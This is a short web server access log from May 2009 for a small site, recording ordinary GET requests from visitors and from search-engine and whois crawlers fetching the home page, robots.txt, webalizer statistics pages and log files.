124.115.1.7 - - [26/May/2009:03:36:29 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [26/May/2009:03:50:40 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [26/May/2009:04:56:54 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [26/May/2009:05:05:41 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [26/May/2009:05:06:27 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
114.80.93.71 - - [26/May/2009:05:13:12 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [26/May/2009:05:17:15 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [26/May/2009:05:26:44 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
64.246.165.190 - - [26/May/2009:05:59:07 +0100] "GET /robots.txt HTTP/1.0" 404 357 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 212 603
64.246.165.190 - - [26/May/2009:05:59:08 +0100] "GET / HTTP/1.1" 206 1266 "http://whois.domaintools.com/decodeine.com" "SurveyBot/2.3 (Whois Source)" 351 1634
216.129.119.14 - - [26/May/2009:07:11:46 +0100] "GET /webalizer/usage_200707.html HTTP/1.0" 200 150873 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 151199
216.129.119.14 - - [26/May/2009:07:31:58 +0100] "GET /webalizer/usage_200702.html HTTP/1.0" 200 109786 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 110111
216.129.119.14 - - [26/May/2009:09:19:41 +0100] "GET /webalizer/usage_200803.html HTTP/1.0" 200 61802 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 62126
216.129.119.14 - - [26/May/2009:10:32:50 +0100] "GET /log/web.log.2 HTTP/1.0" 200 5490 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 202 5813
66.249.65.198 - - [26/May/2009:10:40:56 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.65.198 - - [26/May/2009:10:40:56 +0100] "GET /log/web.log.1 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 294 255
87.74.72.135 - - [26/May/2009:10:57:50 +0100] "GET / HTTP/1.1" 200 1266 "http://www.linkedin.com/profile?viewProfile=&key=12423764&authToken=6dir&authType=name&trk=pymk" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" 487 1625
